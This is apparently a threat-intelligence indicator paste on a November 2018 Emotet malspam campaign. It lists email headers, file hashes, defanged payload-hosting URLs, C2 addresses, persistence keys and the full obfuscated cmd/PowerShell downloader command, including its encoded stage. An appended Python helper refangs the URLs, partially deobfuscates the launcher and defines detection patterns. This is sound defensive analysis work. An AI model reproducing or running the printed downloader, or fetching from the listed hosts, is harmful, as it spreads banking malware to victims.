VRad

#emotet_091118

Nov 9th, 2018
#IOC #OptiData #VR #Emotet #Banker #Feodo #W97M #Powershell

https://pastebin.com/THHMs2wg
other_Emotet_IOCs:
https://pastebin.com/KVNyw9Uq
https://pastebin.com/L2nSzNU4
previous contact:
https://pastebin.com/Y6DnbpHv
FAQ:
https://radetskiy.wordpress.com/2018/10/19/ioc_emotet_011018/
https://kc.mcafee.com/corporate/index?page=content&id=KB90108

attack_vector
--------------
email attach .doc > macro > powershell > GET > %temp%\*.exe

email_headers
--------------
Received: from public-swhrmf-2c.serverdata.net (public-swhrmf-2c.serverdata.net [64.78.61.27])
Received: from public-swhrmf-2c.serverdata.net ([64.78.61.27])
Received: from mail12.intermedia.net (unknown [64.78.61.134])
Date: Fri, 09 Nov 2018 03:44:58 -0300
From: Интернет-магазин С торгом <info@storgom.ua> <auxiliaradmon1@ravisa.com>
To: user0@hq.88.victim.com
Subject: Интернет-магазин С торгом: Order receipt #4553

files
--------------
SHA-256 af2b3dd1afe2b337ea192b9443f4368cc8c6e488d9913fe1ac64ac55e9bb49c8
File name FILE-901171445210110.doc
File size 71.13 KB

SHA-256 9ff551c66e520652a8f1e1ea832a1e361b9a4d877acf1c4fb6001366fbc2ef3d
File name extr
File size 132 KB

SHA-256 db04c89d578d8796007591e2f9c5c0b306fdbf13351232bad8c9fa2acd08e050
File name WCPDll
File size 357.5 KB

activity
**************

payload_src
--------------
h11p\мягкое-стекло{.} рф/OYRECjhJU 404
h11p\sastudio{.} co/GgGV3mOVlN 200
h11p\priscawrites{.} com/tS6M2ffhC 200
h11p\gbsbrows{.} com/JZLqJd4 200
h11p\evelin{.} ru/fgARtN6g 404

netwrk
--------------
132.148.254.223 gbsbrows{.} com GET /JZLqJd4 HTTP/1.1 no User Agent
187.163.174.149 187.163.174.149:8080 GET / HTTP/1.1 Mozilla/4.0

comp
--------------
powershell.exe 2604 132.148.254.223 80 ESTABLISHED
colorerkey.exe 2656 187.163.174.149 8080 ESTABLISHED

proc
--------------
"C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
C:\Windows\SysWOW64\CMD.exe CMD c:\wiNdoWS\SySTem32\CMd /c"SEt vmN=.( $sHELLId[1]+$sHeLlid[13]+'x') ...
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOwERsHEll . (\"{1}{0}{2}\" -f 'I','SET-','tem') ( \"{0}{3}{1}{2}\"-f'vARI','lE',':0SkX','ab' ...
"C:\tmp\862.exe"
"C:\Users\operator\AppData\Local\Microsoft\Windows\colorerkey.exe"

*obfuscated download command:
--------------
/c"SEt vmN=.( $sHELLId[1]+$sHeLlid[13]+'x')( New-oBJEct io.coMpREsSioN.dEFLatEstREAM([iO.MEmorysTREAm] [COnVERt]::FrOMbaSe64sTrINg( 'NZDdasJAEIVfJRcLq1g3VEsoLgGLVlFaBaX2h95kk0l2NdlNk4lrG3z3JrbO5fnOHOYMqaLC12D7RuwhRGcFyF5BTFIFGjmZTn98KhHzkesmohSFsSULTeYuP56+ltHd+J9Za1kZlFhFyjTcnSfz3TBb79LV1XHS/WYARSJsJEUVD4PM06yV89tAuev3zeNkL5cv1wU4Qqo0Kyo3Th42uPKSK8kLVYaBLRTC3zG49Z4HcSwnlG3zVGGHjmmXk7do5vgOvfcGlJNoM/MJ6OMIIct79JP2Wt6jDE5AeWwKCELZIVhKR2mnLd6tsfiuSfMgNjVWpyaIZiqFi+fGaQO7fKGP5gD9RRN6Ubhocg78HAYYyvp8/gU=' ) , [sYstem.io.COMPressIoN.ComPrESSIonMOdE]::DeCOMPress ) ^| % {New-oBJEct syStem.io.STreAmrEadEr( $_, [SYsTEM.tExT.EnCOdiNg]::aScII)}^| %{ $_.reAdTOeND()}) && pOwERsHEll . (\"{1}{0}{2}\" -f 'I','SET-','tem') ( \"{0}{3}{1}{2}\"-f'vARI','lE',':0SkX','ab' ) ( [tYPE]( \"{0}{1}{2}\"-f 'E','N','VirOnment' ) ) ; ( ^& (\"{1}{0}{2}\" -f'ARIA','V','blE' ) ( \"{1}{0}\" -f 'X*xT','E')).\"Val`UE\".\"INvo`kECOmM`AND\".(\"{1}{2}{3}{0}\" -f'PT','in','Vok','ESCri' ).Invoke( ( ( .('Gi' ) ( \"{0}{1}{2}\" -f 'VArIA','bLE:0S','kx')).\"Val`Ue\"::( \"{4}{1}{0}{2}{5}{3}\"-f 'E','t','nvIro','eNtVARIAbLE','ge','nM').Invoke( 'VmN',(\"{1}{0}{2}\" -f 'RoCE','P','ss' ) ) ) )"

persist
--------------
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 09.11.2018 14:52
colorerkey Windows Componentization Platform Servicing API Microsoft Corporation
c:\users\operator\appdata\local\microsoft\windows\colorerkey.exe 09.11.2018 14:45

drop
--------------
C:\tmp\862.exe
C:\Users\operator\AppData\Local\Microsoft\Windows\colorerkey.exe

# # #
doc - https://www.virustotal.com/#/file/af2b3dd1afe2b337ea192b9443f4368cc8c6e488d9913fe1ac64ac55e9bb49c8/details
exe - https://www.virustotal.com/#/file/9ff551c66e520652a8f1e1ea832a1e361b9a4d877acf1c4fb6001366fbc2ef3d/details
https://analyze.intezer.com/#/analyses/c028884b-15ca-4bda-abd0-a22d511fe240
exe#2 - https://www.virustotal.com/#/file/db04c89d578d8796007591e2f9c5c0b306fdbf13351232bad8c9fa2acd08e050/details
https://analyze.intezer.com/#/analyses/01b66204-33f5-4128-8f0f-11db305a3101
@
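
Added triage helper (not part of the original paste): it refangs the `h11p\host{.} tld/path status` notation used in the payload_src section above and partially deobfuscates the cmd/PowerShell launcher so the verbs it hides become readable. Two tricks in the command are resolved: `$sHELLId[1]+$sHeLlid[13]+'x'` indexes into the `$ShellId` automatic variable (assumed here to be `Microsoft.PowerShell`, its value in Windows PowerShell) and spells `iex`, and each `"{1}{0}{2}" -f 'a','b','c'` format-operator expression is assembled back into its literal (`SET-Item`, `vARIablE:0SkX`, `getEnvIronMeNtVARIAbLE`). The sample command line is constructed from fragments of the command above with the base64 blob replaced by a placeholder; the indicator names are my own labels, not a vendor's.

```python
"""Refang payload_src lines and lightly deobfuscate the Emotet-style launcher for triage.
The output is for reading by an analyst, never for execution."""
import re

# $ShellId in Windows PowerShell (assumption); [1] is 'i', [13] is 'e', so [1]+[13]+'x' spells iex.
SHELL_ID = "Microsoft.PowerShell"

# Constructed sample lines in the paste's defanged notation: h11p\host{.} tld/path status
SAMPLE_PAYLOAD_SRC = [
    r"h11p\мягкое-стекло{.} рф/OYRECjhJU 404",
    r"h11p\sastudio{.} co/GgGV3mOVlN 200",
]

# Constructed launcher built from fragments of the paste's obfuscated download command;
# the base64 blob is replaced with a placeholder so nothing here decodes to a payload.
SAMPLE_CMDLINE = (
    r"""CMd /c"SEt vmN=.( $sHELLId[1]+$sHeLlid[13]+'x')( New-oBJEct io.coMpREsSioN.dEFLatEstREAM("""
    r"""[iO.MEmorysTREAm] [COnVERt]::FrOMbaSe64sTrINg( 'BASE64_PLACEHOLDER' ) , """
    r"""[sYstem.io.COMPressIoN.ComPrESSIonMOdE]::DeCOMPress ) ) && pOwERsHEll . (\"{1}{0}{2}\" -f 'I','SET-','tem') """
    r"""( \"{0}{3}{1}{2}\"-f'vARI','lE',':0SkX','ab' ) ( \"{4}{1}{0}{2}{5}{3}\"-f 'E','t','nvIro','eNtVARIAbLE','ge','nM' )"""
)


def refang(line):
    """Parse one defanged payload_src line into ('http://host.tld/path', http_status), or None."""
    m = re.fullmatch(r"h11p\\(\S+?)\{\.\}\s*(\S+?)/(\S+)\s+(\d{3})", line.strip())
    if not m:
        return None
    host, tld, path, status = m.groups()
    return f"http://{host}.{tld}/{path}", int(status)


def resolve_shellid(expr):
    """Evaluate a $ShellId[n] + ... + 'literal' concatenation against the known $ShellId value."""
    parts = []
    for tok in re.split(r"\s*\+\s*", expr.strip()):
        m = re.fullmatch(r"\$shellid\[(\d+)\]", tok, re.I)
        parts.append(SHELL_ID[int(m.group(1))] if m else tok.strip("'"))
    return "".join(parts)


# "{1}{0}{2}" -f 'a','b','c'   (the quote may be cmd-escaped as \" inside a /c string)
FORMAT_OP = re.compile(r"""\\?"((?:\{\d+\})+)\\?"\s*-f\s*((?:'[^']*'\s*,\s*)*'[^']*')""")
SHELLID_CONCAT = re.compile(r"\$shellid\[\d+\](?:\s*\+\s*(?:\$shellid\[\d+\]|'[^']*'))+", re.I)


def resolve_format_operator(text):
    """Replace each PowerShell format-operator reassembly with the literal it produces."""
    def _assemble(m):
        fmt, args = m.group(1), re.findall(r"'([^']*)'", m.group(2))
        try:
            return "'" + fmt.format(*args) + "'"  # PowerShell {n} and Python {n} index positionally alike
        except IndexError:
            return m.group(0)  # malformed: leave as-is rather than guess
    return FORMAT_OP.sub(_assemble, text)


def deobfuscate(cmdline):
    """Apply both resolutions; the result is readable, not runnable."""
    text = resolve_format_operator(cmdline)
    return SHELLID_CONCAT.sub(lambda m: "'" + resolve_shellid(m.group(0)) + "'", text)


# Triage signatures for the launcher shape in this paste; env_var_handoff only
# becomes visible once the format-operator strings have been assembled.
INDICATORS = {
    "shellid_index_iex": SHELLID_CONCAT,
    "format_operator_reassembly": FORMAT_OP,
    "deflate_base64_stage": re.compile(r"deflatestream.*frombase64string|frombase64string.*deflatestream", re.I | re.S),
    "env_var_handoff": re.compile(r"getenvironmentvariable", re.I),
}


def triage(cmdline):
    """Return (readable command line, sorted names of matched indicators)."""
    readable = deobfuscate(cmdline)
    hits = {name for name, rx in INDICATORS.items() if rx.search(cmdline) or rx.search(readable)}
    return readable, sorted(hits)


if __name__ == "__main__":
    for line in SAMPLE_PAYLOAD_SRC:
        print(refang(line))
    readable, hits = triage(SAMPLE_CMDLINE)
    print(hits)
    print(readable)
```

Running the script on the constructed sample prints the refanged URLs with their status codes, the four indicator names, and a command line in which `iex`, `SET-Item`, `vARIablE:0SkX` and `getEnvIronMeNtVARIAbLE` appear in clear; the same `triage()` call can be run over process-creation command lines from endpoint telemetry, where the second stage's handoff via a process environment variable (`SEt vmN=...` then `GetEnvironmentVariable('VmN','Process')`) is the part a plain string match on the original text would miss.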